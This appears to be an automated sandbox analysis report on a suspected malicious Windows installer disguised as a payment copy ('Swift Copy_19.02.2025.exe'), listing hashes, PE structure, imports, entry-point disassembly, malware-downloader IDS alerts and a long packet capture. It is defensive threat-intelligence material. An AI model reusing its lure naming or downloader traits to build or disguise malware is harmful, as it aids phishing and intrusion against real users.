                                                                              SHA-512:47ED14565C2D4208F66A7AE070454243F26D06C72F784B9C8675BA172A0B94CF85868778E8DE07F12ABE6078A29D58A833FA269BFD82CD47A01E9E4601730836
                                                                              Malicious:false
                                                                              Preview:NNNNNNNNNNNNNN.NNNNNNNNNNNNNNN.NNNNNNNNNN.NN^NNNNNNNNNNNNNGNNNNNNNNNNNNNg.NNNNNNNNNNNNNNNJ=NNNNNNNNNNNNNNNNNGNNNNNNNNNNNNNN.NNNNNNNNNNNNNNNNNNNNN.NNNNNNNNNNNNNN.NN.NN.NNNNNNNNNNNNNNNwNNNNNNNNNNNNNNNNNNNNNNNNNNNN".|NNNNNNNNNNNNNNNN.NN=NNNNNNNNNNNNNNNNNN8NNNN.NNNNNNNNNNNNNN.NNNNNNNNjNNNNNN.NNNNNN.yNNN.NNNNNNNNNNNNNNNNNNNNNNNBNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNLNNNNNNNNNNNNNNNNNNNNNNNNNNNNf..NNNNNNNNNNNNNNN.NNNNNNNNNNNNNN.NNNNNNNNNNNNNNN.NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN.NNNNNNNNNNNN.N.NN.NNNNNNNNN.NNN.NNN.NNNNNNNjNNNNNN.NN<NNNNNNNNNN.N.NNNN.NNNNNNNNNNNNNNNNNNN.NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNrNNNNNNNNvpN.NN.NNNjNNN.NNNNNNNN.NNN.NNNN.NNNNN|N.NNNNNNNNNN'NNNNNNNNNNNNNNNNNN.NNNNNNNNNNNNNNNN.NNNNNNNNNNNNN.NNNNNNNNNNNNNNNNNNNNN.NNNNNNNNNN,NN.GNN.NNNNNNNNN!NNNNN.NNNNNNNNNNNNNNNN.NNNNNNNNNNNN.NNNNNNNNNNNNNNNN.NNNNNNNNNNN.NNNNNNNNN.NNNNN.>NNNNNNNNNNNNN.N.NNNNNNNNNN.NNNNNNNNNNNNNNNN.NNNNNNNNANNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNQNN]NNNNNNNNNNN.NNNN.NNN.NNNNNNNNNN.NNNNNNNNNN{K
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):7.9564349118896605
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Swift Copy_19.02.2025.exe
                                                                              File size:693'604 bytes
                                                                              MD5:cfd2a2a0de8c10180319835f2c148578
                                                                              SHA1:a685193f4a254f4a67d116120c870f827d83b561
                                                                              SHA256:7d9639376d9c7dcecfdf494950100a6d04238a7d510d65c4b52225b634073b24
                                                                              SHA512:a423f5abf8ff6b7caa625cb292760f08839527352dde9808f8c73b2d7e5f76d5c7e6f4d997054c39a9375a02a74b044a89efd4dae9e7ad0a4c835c8ae83ca259
                                                                              SSDEEP:12288:Xa/AcZ6qJ2s1+pBOi+jWtpXpUtvntYRo0/vzwZ2XdgjPEmADNA0EpphZNG2K:X4Z6SQB5+ypXGL4oyszjsmY0K
                                                                              TLSH:F1E4239162D4C9EAE0668FF2E47DCAF44DF89D20E938834353547E2D3D7A5018E1A3DA
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....
                                                                              Icon Hash:23034d4b1303112b
                                                                              Entrypoint:0x403359
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                              Instruction
                                                                              sub esp, 000002D4h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              push 00000020h
                                                                              pop edi
                                                                              xor ebx, ebx
                                                                              push 00008001h
                                                                              mov dword ptr [esp+14h], ebx
                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                              mov dword ptr [esp+1Ch], ebx
                                                                              call dword ptr [004080A8h]
                                                                              call dword ptr [004080A4h]
                                                                              and eax, BFFFFFFFh
                                                                              cmp ax, 00000006h
                                                                              mov dword ptr [0042A20Ch], eax
                                                                              je 00007FAED8B00223h
                                                                              push ebx
                                                                              call 00007FAED8B034D5h
                                                                              cmp eax, ebx
                                                                              je 00007FAED8B00219h
                                                                              push 00000C00h
                                                                              call eax
                                                                              mov esi, 004082B0h
                                                                              push esi
                                                                              call 00007FAED8B0344Fh
                                                                              push esi
                                                                              call dword ptr [00408150h]
                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                              cmp byte ptr [esi], 00000000h
                                                                              jne 00007FAED8B001FCh
                                                                              push 0000000Ah
                                                                              call 00007FAED8B034A8h
                                                                              push 00000008h
                                                                              call 00007FAED8B034A1h
                                                                              push 00000006h
                                                                              mov dword ptr [0042A204h], eax
                                                                              call 00007FAED8B03495h
                                                                              cmp eax, ebx
                                                                              je 00007FAED8B00221h
                                                                              push 0000001Eh
                                                                              call eax
                                                                              test eax, eax
                                                                              je 00007FAED8B00219h
                                                                              or byte ptr [0042A20Fh], 00000040h
                                                                              push ebp
                                                                              call dword ptr [00408044h]
                                                                              push ebx
                                                                              call dword ptr [004082A0h]
                                                                              mov dword ptr [0042A2D8h], eax
                                                                              push ebx
                                                                              lea eax, dword ptr [esp+34h]
                                                                              push 000002B4h
                                                                              push eax
                                                                              push ebx
                                                                              push 004216A8h
                                                                              call dword ptr [00408188h]
                                                                              push 0040A2C8h
                                                                              Programming Language:
                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x2fde8.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x62a50x64005814efda24a547f46f687d77de540309False0.6590234375data6.431421556070023IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x80000x13960x1400ef1be07ca8b096915258569fb3718a3cFalse0.453125data5.159710562612049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x550000x2fde80x2fe0030681180cff1042f2d0d4ceee6d45f1aFalse0.9422986700391645data7.870508006637617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x554180x1c24cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003036191401506
                                                                              RT_ICON0x716680x923bPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9948978228930145
                                                                              RT_ICON0x7a8a80x3945PNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States1.0007502898847283
                                                                              RT_ICON0x7e1f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5910788381742739
                                                                              RT_ICON0x807980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.62312382739212
                                                                              RT_ICON0x818400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.7022921108742004
                                                                              RT_ICON0x826e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7955776173285198
                                                                              RT_ICON0x82f900x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.5170731707317073
                                                                              RT_ICON0x835f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7210982658959537
                                                                              RT_ICON0x83b600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7322695035460993
                                                                              RT_ICON0x83fc80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6666666666666666
                                                                              RT_ICON0x842b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.7297297297297297
                                                                              RT_DIALOG0x843d80x120dataEnglishUnited States0.5138888888888888
                                                                              RT_DIALOG0x844f80x11cdataEnglishUnited States0.6056338028169014
                                                                              RT_DIALOG0x846180xc4dataEnglishUnited States0.5918367346938775
                                                                              RT_DIALOG0x846e00x60dataEnglishUnited States0.7291666666666666
                                                                              RT_GROUP_ICON0x847400xaedataEnglishUnited States0.6379310344827587
                                                                              RT_VERSION0x847f00x2b8COM executable for DOSEnglishUnited States0.47413793103448276
                                                                              RT_MANIFEST0x84aa80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                              DLLImport
                                                                              KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                              USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                              SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                              DescriptionData
                                                                              Commentslampatia
                                                                              FileDescriptionflighting redescribes nasioinial
                                                                              FileVersion1.4.0.0
                                                                              InternalNamedovetailwise.exe
                                                                              OriginalFilenamedovetailwise.exe
                                                                              ProductNameautodidakte leah bubas
                                                                              ProductVersion1.4.0.0
                                                                              Translation0x0409 0x04e4
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-02-21T08:22:24.024973+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749972172.217.16.206443TCP
                                                                              2025-02-21T08:22:29.637025+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749974132.226.247.7380TCP
                                                                              2025-02-21T08:22:30.855980+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749974132.226.247.7380TCP
                                                                              2025-02-21T08:22:31.896120+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749976104.21.64.1443TCP
                                                                              2025-02-21T08:22:32.840208+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749977132.226.247.7380TCP
                                                                              2025-02-21T08:22:34.168285+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749979132.226.247.7380TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 21, 2025 08:22:22.519126892 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:22.519167900 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:22.519305944 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:22.533747911 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:22.533766031 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:23.167778015 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:23.168044090 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:23.168406963 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:23.168469906 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:23.673739910 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:23.673768997 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:23.674139023 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:23.674216986 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:23.722476959 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:23.763331890 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:24.024971008 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:24.025125027 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:24.025141001 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:24.025285006 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:24.025340080 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:24.025382996 CET44349972172.217.16.206192.168.2.7
                                                                              Feb 21, 2025 08:22:24.025481939 CET49972443192.168.2.7172.217.16.206
                                                                              Feb 21, 2025 08:22:24.053273916 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.053325891 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:24.053406000 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.053842068 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.053858042 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:24.708812952 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:24.708942890 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.712646961 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.712657928 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:24.713083982 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:24.713172913 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.713512897 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:24.759329081 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.076319933 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.076411009 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.077088118 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.077166080 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.092971087 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.093059063 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.093070030 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.093128920 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.166795015 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.166843891 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.166866064 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.166899920 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.166918993 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.166932106 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.166982889 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.166982889 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.166992903 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.167040110 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.171746016 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.171873093 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.171896935 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.171951056 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.178070068 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.178138971 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.178168058 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.178229094 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.184571028 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.184659958 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.184693098 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.184746027 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.190891027 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.190949917 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.190982103 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.191066027 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.196763992 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.196834087 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.196854115 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.196937084 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.202950001 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.203011990 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.203046083 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.203093052 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.208798885 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.208877087 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.208900928 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.208951950 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.214802980 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.214891911 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.214919090 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.214987993 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.220724106 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.220784903 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.220818996 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.220942020 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.226782084 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.226861954 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.257477045 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.257592916 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.257623911 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.257683992 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.257684946 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.257699013 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.257755041 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.257767916 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.257846117 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.257901907 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.257956982 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.258680105 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.258744955 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.258966923 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.259044886 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.259054899 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.259105921 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.264067888 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.264133930 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.264144897 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.264208078 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.270008087 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.270060062 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.270087004 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.270118952 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.270148039 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.270168066 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.275902033 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.276356936 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.276390076 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.276813984 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.284416914 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.284482956 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.284512043 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.284595013 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.288515091 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.288616896 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.288646936 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.288832903 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.293354034 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.293418884 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.293451071 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.293582916 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.299124956 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.299355030 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.299391031 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.299592018 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.304677010 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.304744959 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.304776907 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.304827929 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.311029911 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.311124086 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.311151981 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.311206102 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.315826893 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.315901041 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.315927982 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.315988064 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.320270061 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.320380926 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.320414066 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.320492983 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.324587107 CET44349973142.250.185.193192.168.2.7
                                                                              Feb 21, 2025 08:22:27.324672937 CET49973443192.168.2.7142.250.185.193
                                                                              Feb 21, 2025 08:22:27.324702978 CET44349973142.250.185.193192.168.2.7
